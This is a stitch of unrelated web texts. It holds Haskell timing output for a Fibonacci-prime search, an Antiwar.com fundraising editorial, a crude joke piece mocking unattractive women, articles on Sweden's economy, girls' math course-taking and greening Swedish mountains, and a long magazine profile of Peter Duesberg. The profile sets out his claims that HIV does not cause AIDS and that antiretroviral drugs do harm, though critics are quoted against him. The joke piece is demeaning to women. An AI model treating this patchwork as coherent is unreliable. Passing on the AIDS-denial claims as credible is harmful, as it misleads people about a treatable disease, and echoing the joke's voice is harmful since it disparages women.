For each found Fibonacci prime the program prints the time spent from the start .
The following output was received on dual - core Athlon64 x2 4600 + microprocessor .
( 0 s , 1 , 3 ) ( 0 s , 2 , 4 ) ( 0 s , 3 , 5 ) ( 0 s , 4 , 7 ) ( 0 s , 5 , 11 ) ( 0 s , 6 , 13 ) ( 0 s , 7 , 17 ) ( 0 s , 8 , 23 ) ( 0 s , 9 , 29 ) ( 0 s , 10 , 43 ) ( 0 s , 11 , 47 ) ( 0 s , 12 , 83 ) ( 0.015625 s , 13 , 131 ) ( 0.015625 s , 14 , 137 ) ( 0.03125 s , 15 , 359 ) ( 0.046875 s , 16 , 431 ) ( 0.046875 s , 17 , 433 ) ( 0.046875 s , 18 , 449 ) ( 0.0625 s , 19 , 509 ) ( 0.078125 s , 20 , 569 ) ( 0.078125 s , 21 , 571 ) ( 2.546875 s , 22 , 2971 ) ( 10.890625 s , 23 , 4723 ) ( 16.859375 s , 24 , 5387 ) ( 104.390625 s , 25 , 9311 ) ( 120.546875 s , 26 , 9677 ) ( 464.359375 s , 27 , 14431 ) ( 3368.578125 s , 28 , 25561 ) ( 6501.296875 s , 29 , 30757 ) ( 11361.453125 s , 30 , 35999 ) ( 13182.71875 s , 31 , 37511 ) ( 37853.765625 s , 32 , 50833 )
In about 10 hours the program found 32 Fibonacci primes from about 40 known so far .
Of course , obtaining each next number takes more time than all preceding ones .
Optimising further
We can improve the performance somewhat by throwing more cores at the problem , and turning up the optimisation level .
Compiling , with optimisations on , on a 4 core machine , also , replacing lazy pairs with strict ones , we get :
$ ghc - O2 - optc - O2 - fvia - C - threaded A.hs - no - recomp -- make
We get the result slightly sooner , and with better cpu utilisation ,
$ time ./A +RTS - N4 .... ( 69.869631s , 25 , 9311 ) ( 88.357936s , 26 , 9677 ) ( 297.578843s , 27 , 14431 )
Note that this program runs at around 300 % cpu utilisation , despite having 4 cores , as we 're contesting for cpu time on this machine .
Improving the algorithm
Are there other factorization theorems for fibonacci primes we can exploit ?
Editorial note :
Three times a week , I address specific foreign policy issues in this space , from the war in Iraq to the next war just over the horizon .
Today , however , I want to step back and give you , the reader , some idea of who we are and why we do what we do .
Antiwar.com is a nonprofit educational organization dedicated to the proposition that aggressive wars are the biggest threat to liberty and humanity : our goal is to stop them before they start , and , once started , to mobilize the broadest possible movement to oppose them .
Since 1995 , our website has been bringing an increasing number of readers the truth about the War Party  its plans , its leaders , and its deceptions .
Since the 9/11 terrorist attacks , we have grown to the point where we have an audience that numbers in the millions .
Each and every day we bring our readers the real news about what ’s going on in the world , the news our rulers do n’t want you to read .
We spotted the lies behind the official rationale for invading Iraq long before the “ mainstream ” media caught on : they were too busy cheerleading the War Party to ask any uncomfortable questions .
We did ask those questions , and we continue to ask them in light of the war propaganda now targeting Iran .
The War Party never sleeps  and neither do we .
Someone is always on duty at Antiwar.com , watching the news wires and ready to respond to the latest crisis with timely analysis that cuts through the propaganda and gives our readers the facts .
Yet we do n’t claim to be unbiased , in the sense that we hold to a definite worldview , one that opposes our interventionist foreign policy and advances a principled , practical alternative : a policy of entangling alliances with none , and economic and cultural exchanges with all .
America ’s proper role in the world is that of an exemplar , not a conqueror or a savior .
We do n’t hold these views in a vacuum : they are based on our understanding of what it takes to maintain our republican system of government .
Americans are faced with a choice : will we keep our constitutional republic , or go the way of Empire ?
We take a side in this struggle , and make no bones about it : yet we are also a journalistic institution , committed to giving our readers the facts and letting them make their own judgements .
Our news section is dedicated to giving our readers the truth insofar as we know it at that particular moment , and our opinion section is labeled as such  and we ’re proud of both .
That ’s what gives Antiwar.com its tang  we ’re not just a news site , or a random collection of soap - boxing pundits .
Our commentary is carefully culled from the left , the right , and beyond to give our readers a combination of good ideas and good writing  a body of analysis that , taken together , gives them some coherent idea of what is really going on in our war - torn world .
Our goal is to forge a new foreign policy consensus in this country , one based on genuine American interests , rooted in constitutional principles , and shorn of imperial pretensions .
We are libertarians , and do n’t make any bones about that , either , and yet we are willing to work with any and all who oppose our present foreign policy of global interventionism , whether it be the neoconservative “ liberatory ” variety or the left - liberal “ humanitarian ” strain : both have proved devastating to American interests , as well as deadly to its overseas victims , from Iraq to the former Yugoslavia .
We do n’t pretend to be the leaders of any kind of organized movement : we are providing a service to our readers , and not any kind of political leadership .
We do n’t endorse candidates for office , or owe allegiance to any political party .
We are concerned with a single issue , and yet it is a very broad one  the complex consequences of a radically wrong foreign policy that has made us less safe , less secure , and less confident of the future .
Our objective is to change that policy , to make it less aggressive and more concerned with actually protecting Americans in our own homeland .
We want a foreign policy that puts America first , and not the security of some far - off Middle Eastern country that is arguably peripheral to our own legitimate interests .
We want a foreign policy that acknowledges the limits of American power , and abjures the immoral and dangerous doctrine of preemptive war adopted by the Bush administration .
Antiwar.com is a project of the Randolph Bourne Institute , which is dedicated to the study and propagation of anti-war and anti-statist ideas , educating the public in the principles of non-interventionism and supporting journalists , writers , and others to advance the cause of peace .
As a nonprofit educational organization , we depend on the generosity of our readers : their tax - deductible donations enable us to stay in business and continue to give our global readership a clearer , truer perspective on world affairs than is available in the so - called “ mainstream ” media .
We employ a very small staff to do the work that is normally backed up by a major corporate entity : it ’s almost a miracle that we ’re able to duplicate in large part what is done by a newsgathering organization with many more resources than we have at our disposal .
Yet we somehow manage to do it , and have been doing it for over a decade .
We have our readers , many of whom contribute generously year after year , to thank for that .
In addition to longtime supporters who understand what we ’re trying to do and have provided us with the bedrock support we need to continue , our network of supporters is expanding , worldwide .
Antiwar.com is the major news source for a growing international network of opposition to the War Party  precisely what is needed to stop the dangerous radicals who have seized control of U.S. foreign policy and are driving this country , and its future , over a cliff in pursuit of a wrongheaded “ ideal . ”
Yet there is nothing “ idealistic ” about a foreign policy based on mass murder , and the military occupation of a country that has never attacked us or posed a threat to our legitimate interests .
We do n’t just need to get out of Iraq  we need to get out of the mindset that conceives of the world as our personal stage , where America is the director , the producer , and the scriptwriter .
Pride cometh before a fall : it ’s an old adage , applicable to nations as well as individuals .
Our leaders , of both parties , have been guilty of the sin of hubris , the belief that the American state is endowed with almost godlike powers , that our military can accomplish anything , and that all the Commander - in - chief has to do is will it and it will be so .
This has been our downfall in Iraq , and worse is yet to come  unless we change direction and foreswear the temptations of Empire .
American foreign policy is in crisis : the failure of the neoconservative vision of “ global hegemony ” cannot be denied .
What is needed is a complete reorientation away from an imperialist mindset , and a return to a more modest and realistic conception of America ’s role in the world .
Our task is clear , and we have a long way to go to accomplish it .
Yet we forge ahead with confidence , optimistic that the American people are waking up to the enormous fraud perpetrated by the War Party , and hopeful that we can recapture American foreign policy in the interests of a more peaceful world .
You can help us achieve that goal .
NOTES IN THE MARGIN
I‘ll be speaking in Rockport , Maine , on Monday April 21 ( a Monday ) , at the monthly luncheon of the Mid-Coast Forum on Foreign Relations , at Chez Marcel restaurant in the Samoset Resort .
The program lasts from 11:30 a.m. to 2 p.m. , including a brief soiree for socializing , my talk 
“ The Middle East : Turning the Page on U.S. Foreign Policy ”  a question - and - answer session , and luncheon .
Call 207-236-8288 for more information .
I get to be politically incorrect over at Taki ’s Magazine , and I ’m loving it .
Also , why I ’m bitter , too .
UPDATE : Oh , and before I forget , go check out my semi-regular feature over at Takis magazine : " At This Ungodly Hour . "
Since the beginning of time , ugly girls have always gotten in the way of attempts to hook up with their more attractive friends .
To neutralize these women , homies have begun “ taking one for the team ” and either distracting these swamp - donkeys , or when absolutely necessary , even taking one of these women home .
The first recorded case of taking one for the team occurred in Cuba in 1955 .
Fidel Castro was trying to do work with a young woman from the ruling class who ’s unattractive sister was cock - blocking him .
Fidel , thinking on his feet , quickly called over his boy Che Guevara and had him tell the sister his theories on revolution .
The sister was so taken with Che and his beret , she forgot about her sister and Fidel .
When asked about the night later , Fidel said : “ That night is the reason Cuba is so well known for its cigars . ”
Sweden is often viewed as either social democratic paradise or lefty hell , depending on one ’s political and economic orientation .
Parts of the popular image are true .
Sweden has a strong political left ; the Social Democratic party was in power continuously for more than four decades in the middle of the 20th century and has alternated in the government since then ( it ’s out at the moment ) .
Around 80 % of employed Swedes are union members , and 30 % are employed by the government .
More than half of the country ’s GDP passes through the government in taxes , and government spending on redistributive transfers and public services is among the highest in the world .
Income inequality is among the lowest .
Female employment is high , and the gender pay gap is low .
A 2008 Newsweek index of environmental performance put Sweden at the top .
It is ranked as one of the world ’s most peaceful nations .
Like all countries , though , Sweden is more complex than the stereotype suggests .
Here are a few things that may surprise .
Surprises for the left
1 . The country has a strong work ethos .
The welfare state is generous , but most able - bodied Swedes of working age are expected to be employed .
During the 2000s the Swedish employment rate has averaged about 74 % of the working - age population , two percentage points higher than in the United States .
The share of working - age Swedish households with no employed adult is 5 % , the same as in the U.S .
2. Embrace of globalization .
Exports and imports total around 45 % of Swedish GDP , compared to 15 % in the United States .
Swedish policy aims to encourage trade and to cushion the adverse impact this inevitably has on some , ensuring their incomes remain at a decent level while they ’re unemployed and facilitating transition to a different firm and / or occupation .
3. School choice .
Since the early 1990s government funds have been provided not only to public elementary and secondary schools but also private ones , and parents are permitted to choose which school their children attend .
This comes with strings attached : private schools wishing to receive the funding cannot base admission on ability , religion , or ethnicity .
But in other relevant respects the public schools are forced to compete with private ones .
4. Partially privatized pensions .
In the late 1990s a social democratic government introduced a “ privatized ” element into the Swedish pension system .
2.5 % of employee earnings are put into a defined - contribution component .
The employee has a variety of choices about how the money is invested .
( A key difference between this reform and the one proposed by President Bush several years ago for the U.S. : Swedish payroll taxes were increased so that this added to the existing system , rather than replacing part of it . )
Surprises for the right
1. Sweden has a competitive economy .
In the World Economic Forum ’s 2007 - 08 “ competitiveness index , ” Sweden placed 4th out of 131 nations .
It has been in the top ten , often among the top five , throughout this decade .
Like the other Nordic countries ( Denmark , Finland , Iceland , and Norway ) , Sweden has been successful at adapting to the shift from manufacturing to services and to a more globalized and competitive economic environment .
These economies have done particularly well in high - tech industries .
This owes to , among other things , high - quality educational systems , excellent public infrastructure , heavy R&D investment , and commitment to adaptation .
2 . High mobility .
For a long time the consensus view among researchers was that egalitarian countries such as Sweden have low inequality but also little mobility , whereas the United States has more inequality but also greater opportunity for upward and downward movement .
Recent findings suggest this is wrong .
Mobility in Sweden , both between generations and over the life course , is at least is great as in the United States and likely greater .
3 . The poor are well - off absolutely , not just relatively .
Critics of high taxes and generous government benefits sometimes imagine that these destroy economic growth , so that countries like Sweden have low inequality but also low absolute living standards .
In fact , the incomes of those at the bottom of the distribution in Sweden are similar to those of their American counterparts .
And Swedes work far fewer days and hours to get those incomes .
They also enjoy more plentiful and higher - quality public services , from schools to child care to health care to public transportation to roads and parks .
4. Sweden is heterogeneous .
Those skeptical about the applicability of Swedish policies and institutions often argue that to the extent Sweden “ works , ” it ’s because it has an extremely homogeneous population .
That was likely true half a century ago , but these days Sweden ’s immigrant ( foreign - born ) share is virtually identical to America ’s , at about 13 % of the population .
What effects this may have over the long run are hard to anticipate , but it ’s been that way for more than a decade now .
Over 70 percent of high school teachers are female and girls in high school take as many math courses as boys , yet it 's believed female interest in math and science still wanes considerably in high school and college .
A new study conducted by researchers at the University of Texas at Austin , the University of Pennsylvania , and Michigan State University published in Child Development says girls , more than boys , look to their close friends when they make important decisions such as whether to take math and what math classes to take , confirming how significant peers are during adolescence .
Researchers looked at 6,547 high - school girls and boys who had a variety of relationships with peers and tracked the math courses they took .
All of the students had taken part in the National Longitudinal Study of Adolescent Health from 1995 to 2001 .
The researchers found that , contrary to popular opinion but in line with recent government findings , girls have caught up with boys in terms of the math courses they take in high school .
One reason this is so , they found , is the kinds of friends and peers they have in high school .
All teens — girls as well as boys — with close friends and other peers who made good grades took more higher - level math than other teens , according to the study .
But the connection between these relationships and the math classes was stronger for girls than for boys .
In the end , social factors meant more for girls than for boys in decisions about math coursework , especially when enrollment in math classes was optional and when girls were doing well in school .
“ These findings stress the need to turn attention away from documenting gender differences in math course - taking in high school and toward looking at the reasons why girls and boys take different paths to the same outcomes , ” according to Robert Crosnoe , associate professor of sociology at the University of Texas at Austin and the study ’s lead author .
“ In other words , just because girls and boys might have the same academic standing at the end of high school does not mean that they got there in the same way . ”
The study was funded , in part , by the National Institute of Child Health and Human Development and the National Science Foundation .
Summarized from Child Development , Vol. 79 , Issue 1 , Peer Group Contexts of Girls ’ and Boys’ Academic Experiences , by Crosnoe , R , and Riegle - Crumb , C ( University of Texas at Austin ) , Field , S ( University of Pennsylvania ) , Frank , K ( Michigan State University ) , and Muller , C ( University of Texas at Austin ) .
WattHead.org delivers news , original analysis , and opinionated commentary on the critical transition to a clean and prosperous energy future , featuring writing from some of the web 's smartest young thinkers .
Founder and Chief Editor : Contributors include :
Sweden 's mountains are growing greener .
At the border between woods and bare mountain , trees that require warm temperatures , such as oak , elm , maple , and black alder , have become established for the first time in 8,000 years .
This is shown in current studies led by Leif Kullman , professor of physical geography at Umeå University in Sweden .
Over the last century , the temperature has risen by more than one degree .
The cooling trend over several thousand years is broken , and this has triggered changes in flora , fauna , and landscapes .
In important respects , the present state is similar to what occurred directly after the latest ice age .
“ Most noticeable , alongside the melting of glaciers , is an elevating of the timberline by 200 meters .
Bare alpine areas are shrinking , and typical Nordic mountain birch forests are losing ground to spruce and pine , which are more competitive in a warmer and drier climate , ” says Leif Kullman .
The alpine landscape is becoming generally greener and more inviting .
Many mountain plants have produced profuse blossoms as well as prodigious amounts of seeds and fruits in the last few years .
Plants that were previously limited to the borderline between woods and bare mountain are now rapidly climbing alpine slopes .
“ The changes are so rapid that plants like fireweed ( rose bay ) and rowan have even taken root in the gravel up on melting glaciers .
Even wood anemones are appearing higher up the mountain , ” says Leif Kullman .
The alpine flora and biodiversity are thus burgeoning dramatically .
More and more plants are migrating to the high mountains since the warmer climate is conducive to them , including contorta pine and cembra pine , which are not native to Scandinavia .
The distribution of the mountain landscape ’s various plant communities is in flux .
Certain plants , such as mosses and low - growing herbs , are adapted to a short growing period after the snow melts .
As the snow thaws earlier and earlier , these plants have been replaced by brush and grass heaths , which has lent the mountain slopes a steppe - like appearance .
Mountain fens are drying up , which means that sedge and grass vegetation is growing denser , new species are migrating in , and in some places glorious alpine meadows are appearing .
At the highest elevations , formerly the domain of sterile gravel and boulders , fens are occurring .
Changes in flora impact the conditions for the mountain fauna .
Leif Kullman has observed new bird and butterfly species , such as wrens and admirals , at ever higher elevations .
The knowledge generated by the current monitoring system is a precondition for models that describe the development of a possibly warmer future .
“ The alpine world is evincing truly major changes despite the modest increase in temperature .
Present prognoses of a temperature increase of three degrees by 2100 will entail considerably more sweeping changes .
We can expect fewer bare mountain areas , even more lush vegetation , and a richer flora , ” says Leif Kullman .
The studies were carried out primarily in Sweden ’s southern mountain regions in the provinces of Jämtland , Härjedalen , and Dalarna .
Data from more than 200 sites have been recorded at various times since 1915 .
There is no other series of this scope in the world .
Under a brilliant early - morning sky in Berkeley , California , Peter Duesberg pushes his bicycle along Oxford Street while animatedly explaining his new theory of cancer — oblivious to the fact that he is about to walk in front of a car .
A professor of molecular and cell biology at the University of California at Berkeley , the 71 - year - old Duesberg could pass for a younger man .
He is slender , with white hair and strong features , and today he is wearing a black leather jacket over a button - down shirt .
Cancer is an old passion , a topic he has been researching for more than 40 years .
Now his radical theory on the origins of the disease is finally winning serious attention .
He is so absorbed in conversation that only as disaster is about to strike does he look up to see the car bearing down on him .
Duesberg giggles as if enjoying a private joke and steps back to the curb , pulling his bike with him .
But even before he reaches the safety of the sidewalk , he has resumed his explanation of aneuploidy , the basis of his theory about the cause of cancer .
Duesberg is no stranger to controversy — or oncoming traffic .
On March 1 , 1987 , he published a paper in Cancer Research questioning the role of HIV in causing AIDS .
The paper became the line in the sand , the demarcation between Duesberg the golden boy of biology — part of the team that first mapped the genetic structure of retroviruses­ , codiscoverer of the first viral cancer gene in 1970 , clever critic — and Duesberg the demon .
For 23 years before the publication of that paper , Duesberg says , he never had an application for public funding of his research turned down .
In 1986 , at age 49 , he was elected to the National Academy of Sciences .
That same year he was given a National Institutes of Health Outstanding Investigator Award , one of the most prestigious and coveted grants .
Robert Gallo , co-discoverer of HIV and a former friend of Duesberg ’s , praised him in 1985 as a “ man of extraordinary energy , unusual honesty , enormous sense of humor , and a rare critical sense . ”
He added , “ This critical sense often makes us look twice , then a third time , at a conclusion many of us believed to be foregone . ”
Since the 1987 article on HIV , Duesberg has become a pariah among scientists .
More than 20 of his grant proposals for government funding have been turned down .
AIDS activists have denounced him in public protests and media campaigns .
Friends , Gallo among them , have abandoned him .
His laboratory , once staffed by two secretaries and numerous graduate students and postdocs , is now occupied by only Duesberg himself and one graduate student — although undergraduates do circulate in and out .
He has no secretary .
His wife , who pinch - hits as an assistant , talks in a whisper about the pain of his exclusion from the rest of academia , social events , and a normal life .
Otherwise mild - mannered scientists known for choosing their words carefully , who might once have called Duesberg the Einstein of biology , now spew vitriol at him , making hurtful comments that he claims roll right off him .
In a pointed reference to those who say the Holocaust never occurred , he and others who challenge the prevailing understanding that HIV is the cause of AIDS have been labeled “ denialists . ”
The label is not without irony .
Duesberg was born in Münster , Germany , in 1936 to physician parents ; his mother was an ophthalmologist and his father a renowned and groundbreaking internist .
Despite the war that would soon be raging in Europe , Duesberg describes his childhood as oddly idyllic , a time when he delighted in play and small pranks .
As an altar boy given the task of carrying the thurible filled with burning incense during Catholic services , Duesberg discovered the fun of swinging it faster than necessary , creating plumes of smoke that caused parishioners to cough and choke .
It was a source of hilarity for him and the other altar boys , and when the priests scolded them , it only added to the fun .
He enjoyed summers at Lake Constance on the border Germany shares with Austria and Switzerland , where he swam , bicycled , and played games with other children “ like there was no tomorrow . ”
Duesberg insists he was shielded from the war .
Yet it was far from invisible , even in the small towns where he lived and played .
“ I still remember … these speeches on the radio , ” he says .
“ We were supposed to believe in the Final Victory . ”
His teacher , who wore a swastika on his jacket , told the class that the Reich would win the war with Wunderwaffe — literally , “ wonder weapons . ”
“ We were too young to take it terribly seriously , ” Duesberg says , adding that the sound of sirens warning of incoming bombers evoked a boyish sense of excitement .
“ We would go look at the bombs and collect fragments , ” he says .
But on December 25 , 1944 , when the sirens sounded and the Duesbergs hunkered down in a makeshift bomb shelter , the family home at 11a Heinrichstrasse in Kreuznach , near Frankfurt , was bombed .
Only in a later conversation does Duesberg admit that even today the sirens of fire engines or ambulances in the streets of Berkeley provoke in him a primitive fear reflex — a lasting effect of the war years .
Duesberg ’s parents , both intellectuals who held politics in contempt , were unable or unwilling to openly confront the Nazi threat .
In an attempt to evade pressure to join the Nazi Party , Duesberg ’s father volunteered for the army .
After serving as a doctor in Russia , he was captured by British soldiers in Belgium and held as a prisoner of war for a year in England before being released and returned to Germany in 1946 .
Duesberg ’s parents separated shortly after the war .
Duesberg is self - conscious about his heritage , and it is perhaps inescapable that the war and his father ’s role in the German army would have fueled some of this .
These factors may also have planted the seeds of a complicated , disquieting side of him that persists to this day .
When asked about his father , Duesberg is remarkably restrained , even evasive .
He shrugs off questions , his face betraying neither affection nor anger .
When asked about his father ’s seminal contribution to the understanding of cardiovascular shock , the accomplished son demurs , saying , “ I do n’t really know what his theory of shock is . ”
As it did with his father , though , science would define Duesberg ’s life .
The postwar years led to “ an enormous upswing in science , ” he says .
The discovery of polymers , or repeating chains of proteins , opened up expanses of research .
“ This is when insulin was sequenced , ” he says .
“ It ’s what kids in high school talked about . ”
At first Duesberg ’s interest was in chemical rather than biological polymers .
The possibilities for new inventions were seemingly limitless .
However , after he earned his Ph.D. in chemistry from the University of Frankfurt in 1963 , one of his professors , Theodore Wieland , told him that the most important and exciting work was in the hunt for the viruses thought to cause cancer .
Duesberg remembers Wieland ’s advising him : “ Go west , young man .
Go west . ”
Duesberg , thinking it would make him “ rich and famous , ” decided to take his professor ’s advice and move to the United States .
Peter Duesberg ( Credit : Howard Cao )
Over the next four decades , Duesberg would throw himself into his passion for science , traveling thousands of miles from his homeland .
Even so , he still peppers his conversations , no matter the topic , with World War II metaphors and references to Hitler and his henchmen — and to the “ good Germans ” who did as the government demanded .
It is hard to understand him at times , not just because of his sharp German accent and odd phrasings but because he makes mental leaps that can leave a listener exhausted .
In rapid - fire sequence he jumps from scientific minutiae to grand political comparisons ( viruses , bacteria , oncogenes , even researchers who study these entities can be transformed into Goebbels or “ good Germans ” ) , and then he might toss in an entirely new idea before returning to his original topic — all within seconds .
In 1964 Duesberg arrived at Berkeley as a postdoctoral fellow hoping to unlock the secrets of cancer .
He recently walked along the long , easy pathways of the university recalling the excitement of his early cancer research and how he had joined in the hunt for retroviruses .
At the time , most researchers thought virtually all cancers were caused by viruses .
Retroviruses were considered the likely culprits since they could cause cells to go into overdrive .
By inserting their genetic material into the host ’s genome , they triggered cell proliferation and sometimes tumor formation .
In 1911 Peyton Rous demonstrated that one retro­virus , now called Rous sarcoma virus ( RSV ) , could produce tumors when injected into healthy chickens .
In 1970 Duesberg , along with a colleague , Peter Vogt , isolated the RSV gene responsible for causing those tumors — the SRC gene .
This was the first cancer gene , or oncogene , ever identified — a celebrated breakthrough that truly put the young German on the scientific map .
Following up on this , Harold Varmus and J. Michael Bishop discovered the homologous SRC gene in normal human cells in 1976 , for which they later received the Nobel Prize .
It was thought that the human , or “ cellular , ” SRC gene , after undergoing a mutation , would trigger cancer .
This launched a new era in cancer research and a mad dash to identify cancer genes , the little time bombs said to exist on otherwise normal strands of DNA , which one researcher dubbed “ the enemy within . ”
Rather than bask in the glory of having been first to isolate the oncogene , Duesberg began to doubt that the enemy really­ was within .
He started to suspect that oncogenes do not cause cancer .
To prove that they do , Duesberg says , researchers should be able to create cancer in cell cultures by inserting human cancer genes into human cells .
But after two decades , millions of dollars of public and private funding , and the best efforts of cancer researchers , himself included , Duesberg says that no combination of genes has ever produced cancer in tissue cultures .
This is a point strongly repudiated by a number of well - respected cancer researchers , such as Robert Weinberg of the Whitehead Institute for Biomedical Research in Cambridge , Massachusetts .
Weinberg , who is also a professor of biology at MIT , says he has created cancer cells in culture by adding oncogenes — as , he stresses , have hundreds of others .
“ It is not a point of contest , ” Weinberg says .
“ It is as debatable as whether day follows night or 3 follows 2 ” — that is , not debatable at all .
But Duesberg insists Weinberg ’s experiments were not correctly interpreted ; the chromosomal defects seen in those experiments , he now says , were the cause , not the result , of the cancer .
Despite Duesberg ’s groundbreaking work , his accolades , and his federal grants ( which continued through the mid-1980s ) , once he began to question the widely accepted role of oncogenes as the cause of cancer , his colleagues began to give him the cold shoulder .
The evidence of their disdain was embarrassingly public .
Around 1984 , when a student of his pointed out that Duesberg had not attended a West Coast meeting of scientists working on tumor viruses , he suddenly realized that he was no longer being invited to the informal meetings .
For 12 years Duesberg had regularly met with his colleagues , including Peter Vogt and Nobel laureates Varmus and Bishop , among others .
“ We had vigorous debates , ” Duesberg says .
“ But I thought that was good science .
You challenge ideas .
I thought it was all in good spirit . ”
Other researchers did n’t see it that way .
Duesberg ’s constant natter about problems with oncogenes as the cause of cancer seemed to them a distraction , even an obstruction .
So they simply stopped inviting him to meetings .
They failed to respond to his letters and calls .
They no longer welcomed him to stay in their homes during out - of - town conferences , as they had in the past .
Weinberg , who first met Duesberg in the 1970s , calls him a “ contrarian ” with a “ corrosive and acidic wit . ”
He feels that it was these traits , more so than science , that later guided Duesberg ’s decision to challenge the theory of HIV .
“ He is like a man who is shipwrecked on an island , struggles onto the beach , looks around , and says : ‘ Is there a government here ?
If so , I ’m against it . ’ ”
In 1984 , while Duesberg was researching cellular and viral oncogenes , he heard Margaret Heckler , who was Secretary of Health and Human Services , announce that his then friend Robert Gallo had discovered that HIV was the cause of the mysterious new plague known as AIDS .
Duesberg was instantly suspicious .
He knew that HIV is a retrovirus — the subject of his own heralded research — and that retroviruses do n’t kill the host cells they infect .
If anything , they make them proliferate .
That is the opposite of what happens with AIDS , where special immune cells known as CD4 cells are knocked off .
The more Duesberg looked for answers , the more he came to believe that the original hypothesis of top AIDS researchers was actually correct :
The disease was — at least in the United States — brought on by drug use and other immune - suppressing causes .
Inside his large , bustling laboratory in Berkeley ’s famous Stanley Hall , Duesberg plotted out graphs of the 1960s and ’ 70s epidemic of drug abuse , including busts for heroin , cocaine , and other drugs .
Then he superimposed them on other graphs illustrating the rise of AIDS .
Allowing for a time separation of a decade or less , he found a close correlation between the two groups of graphs .
Although there was nothing new about drug abuse , it appeared there was something new about the intensity of use and the types of drugs used , particularly among gay men .
Duesberg likens the problem to smoking :
If you smoke a few cigarettes , even over a decade , your chance of lung cancer might remain fairly low , but smoke several packs a day over several decades and your risk soars .
Research by numerous investigators showed that most of the gay men who first developed AIDS had a long history of drug abuse that often included “ poppers , ” a nitrite drug that treats heart disease .
Poppers were widely used not only to get high but also to relax the anal muscles to make sexual intercourse easier .
According to several research accounts , a number of the men were having multiple daily sexual encounters that could easily translate into hundreds of partners over a lifetime .
Since nitrites are powerful carcinogens , Duesberg thought this explained why gay men frequently developed the cancer Kaposi ’s sarcoma but other risk groups , such as hemophiliacs and heterosexual drug abusers , rarely did .
The eventual decline in Kaposi’s , he now says , was due to a decline in the use of poppers — a position bolstered by a study that found that mice briefly exposed to poppers developed signs of reduced immune function .
In 1986 , after more than two years of research , Duesberg was so convinced that the HIV theory of AIDS was dead wrong that he spent nine months writing his paper on HIV for Cancer Research .
The reaction was explosive .
Both Duesberg and his hypothesis were roundly condemned by the overwhelming majority of AIDS researchers , many of whom had been his friends .
Max Essex , a professor of infectious diseases at Harvard University and one of the first to suspect that HIV was the cause of AIDS , had met Duesberg in the mid-1970s ; he says Duesberg was always fun and that “ everyone wanted to go for drinks with him . ”
Today Essex dismisses Duesberg as a crank whose sarcasm has grown meaner over time .
“ Everyone , ” he says of the many who abandoned Duesberg , “ thought he was someone to stay away from because he was such a loose cannon who did n’t think before he spoke . ”
Duesberg says his critics have failed to provide satisfactory answers to perplexing contradictions about AIDS .
For example , he asks , why does Kaposi ’s sarcoma , a cancer of the blood vessels , occur almost exclusively in gay males and not in heterosexual drug users ?
Why is AIDS rarely transmitted by heterosexual contact in Europe but is said to spread rapidly among heterosexuals in Africa ?
If AIDS is caused by a virus , why has it been impossible for researchers to develop a vaccine after 20 years and millions of dollars spent ?
Finally , could it be , as Duesberg suggests , that antiretroviral ( ARV ) drugs used to attack HIV actually do more harm than good , contrary to the common assumption that they have dramatically reduced AIDS deaths ?
Genial and soft - spoken , Essex shoots down Duesberg ’s ideas about ARVs by saying : “ There are now 15 or 20 different drugs that act in 8 or 10 different ways , and the only thing they have in common is that they inhibit the virus from replicating and lower the viral load to negligible levels .
If you include three of them at once … as soon as that happens , the immune system recovers . ”
For the stances he has taken , Duesberg has faced such ferocious personal and professional attacks that in 1996 Richard Horton , editor of the British medical journal The Lancet and himself a critic of Duesberg , broke ranks and wrote in The New York Review of Books : “ Duesberg deserves to be heard , and the ideological assassination that he has undergone will remain an embarrassing testament to the reactionary tendencies of modern science .
Irrespective of one ’s views about the validity of some of Duesberg ’s arguments , one is forced to ask :
At a time when fresh ideas and new paths of investigation are so desperately being sought , how can the AIDS community afford not to fund Duesberg ’s research ? ”
Sitting in the small , cramped laboratory to which he has been relocated in Berkeley ’s Donner Hall , Duesberg surprises this writer when he observes , “ Scientific isolation has its advantages . ”
In the years since he took his stance on HIV , he has seen his resources dwindle , but he has also been cut loose from the strings that come with public funding .
“ I was free to pursue things the way I saw them , ” Duesberg says .
Sitting amid floor - to - ceiling shelves overflowing with papers , boxes of journals , and textbooks on oncology , AIDS , medical virology , biochemistry , and immunology , Duesberg responds to a question about one book , Thou Shalt Not Think : The Brutally Frank Guide to Life by David Jack .
“ The author sent that to me , ” he says of the book , which explains how orthodox thinking is enforced .
“ We ’re supposed to be ‘ good soldiers ’ following orders from the higher - ups , ” he adds disdainfully .
In the late 1980s , while continuing to defend his stance on HIV , Duesberg threw himself back into his original work : trying to solve the puzzle of cancer .
If bad genes were n’t the cause of cancer , what , then , was causing cells to run so horribly amok ?
Searching for clues in the scientific literature , he came across the forgotten work of Theodor Boveri .
In 1914 Boveri observed that sea urchin embryos with abnormal amounts of chromosomal material , a condition called aneuploidy , looked cancerous .
After continued study , Boveri surmised that aneuplody could cause cancer .
Duesberg found Boveri ’s observations intriguing .
Gene mutations were far less likely to create the kind of havoc that deranged chromosomes containing thousands of genes could cause .
Genetic mutations , whether inherited or acquired , Duesberg says , are akin to removing one or two workers on an auto assembly line ; cars would still be produced with virtually no flaws .
But damage to an entire chromosome , he says , is like removing an entire section of an assembly line and plunking it down where it should n’t be .
Suddenly cars would be produced with two engines or no engine at all — or with a carburetor where the exhaust system should be .
Having no money , no support , and no staff in 1996 , Duesberg placed a call to his old friend and colleague Ruediger Hehlmann , a highly respected professor of medicine at the University of Heidelberg in Mannheim , Germany .
Recently Hehlmann , wearing a full - length lab coat over a dark blue suit in his meticulously neat office , discussed Duesberg and his many successes .
Hehlmann is a strong supporter of his friend ’s cancer research , calling him the “ father of oncogenes ” and a genius in the field .
But when the subject of AIDS comes up , his face clouds over .
“ I think he ’s wrong .
That ’s what I think , and I tell him . ”
Even so , Hehlmann approached the medical school ’s dean for money to fund a professorship .
The dean , who had known and admired Duesberg ’s father , responded enthusiastically , saying : “ Oh , that ’s the son !
OK .
We ’ll take him . ”
Since his appointment at the University of Heidelberg in 1997 , Duesberg has spent each of the last 10 summers in Mannheim down the hall from Hehlmann , conducting experiments in cancer and aneuploidy .
Mannheim , which sits at the junction of the Rhine and Neckar rivers , its cobblestone streets lined with upscale shops and outdoor cafés , provides a quiet workplace and sanctuary for Duesberg during these summers .
It is here that he has refined his theory of aneuploidy as the cause of cancer .
It was also in Germany , in 1993 , that Duesberg met his future wife , Sigrid Sachs .
An attractive blonde with sky - blue eyes , Siggi , as everyone knows her , was smitten with Duesberg right away .
“ It was nice from the beginning , ” she says .
“ I liked his sarcasm , and he was different — very funny and intelligent . ”
The two met at a conference in Bonn that Siggi helped organize and to which Duesberg had been invited to speak , along with his nemesis Robert Gallo .
